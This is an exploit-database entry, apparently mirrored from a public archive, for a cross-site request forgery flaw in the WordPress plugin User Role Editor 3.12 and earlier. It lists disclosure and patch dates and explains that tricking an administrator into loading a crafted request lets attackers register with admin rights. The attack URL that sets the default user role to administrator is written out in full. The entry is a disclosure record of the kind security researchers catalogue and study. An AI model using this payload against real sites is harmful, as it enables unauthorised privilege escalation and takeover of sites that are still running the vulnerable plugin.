[] NeoSense
E X P L O I T S
title author type platform port cve id

WordPress Plugin User Role Editor 3.12 - Cross-Site Request Forgery

Author: Henry Hoggard
type: webapps
platform: php
port: 
date_added: 2013-05-26 
date_updated: 2013-05-26 
verified: 0 
codes: OSVDB-93699 
tags: WordPress Plugin
aliases:  
screenshot_url:  
application_url: 
# Exploit Title: WP User Role Editor CSRF
# Date: 19/5/13
# Exploit Author: Henry Hoggard
# Author Website: http://henryhoggard.co.uk
# Vendor Homepage:https://wordpress.org/support/plugin/user-role-editor
# Software Link:https://wordpress.org/support/plugin/user-role-editor
# Version: <=3.12
# Tested on: Debian
# CVE : none yet

Notified Dev: 16/05/13
Patch Released (3.14): 17/05/13

Description:
This allows you to sign up with admin privileges if you make the admin
visit your CSRF script.

http://server/wordpress/wp-admin/users.php?page=user-role-editor.php&action=default&user_role=administrator
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.